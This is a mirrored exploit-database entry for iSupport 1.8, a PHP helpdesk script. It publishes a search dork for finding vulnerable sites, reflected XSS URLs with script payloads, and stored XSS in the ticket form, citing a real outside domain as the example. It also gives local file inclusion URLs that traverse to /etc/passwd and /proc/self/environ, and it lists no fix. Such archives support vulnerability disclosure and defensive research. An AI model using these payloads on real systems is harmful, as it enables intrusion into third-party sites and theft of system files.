bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/10478.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

54 lines
No EOL
1.5 KiB
Text
Raw Blame History

---------------------------------------------
++ iSupport <= 1.8 ++
XSS/Local File Include Exploit
---------------------------------------------
Discovered by : Stink' & Essandre
DATE : 16/12/09
//////////////////////////////////////////////////////////////////////
Website : http://www.idevspot.com/
DEMO : http://www.idevspot.com/demo/iSupport/
DOWNLOAD : http://www.idevspot.com/iSupport.php => $
//////////////////////////////////////////////////////////////////////
[+] Vulnerability and Exploitation
Dork : "Powered by [ iSupport 1.8 ]"
--[XSS]--
http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=[XSS]
http://[TARGET]/[PATH]/function.php?which=[XSS]
Exemple :
http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
http://serverhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
--[XSS]-- in the member zone
http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php
The flaw is in the form.
In "Subject, Comments, etc. ..."
After clicking "Submit Ticket" and you have your alert xss:)
--[LFI]--
http://[TARGET]/[PATH]/index.php?include_file=[LFI]
Exemple :
http://server/helpdesk/index.php?include_file=../../../../../proc/self/environ
http://server/helpdesk/index.php?include_file=../../../../../etc/passwd
[+] Solution :
N/A
The flaw is secure on some site, but we do not know if the publisher or persons using the scripts that are secure.
Reference in a new issue View git blame Copy permalink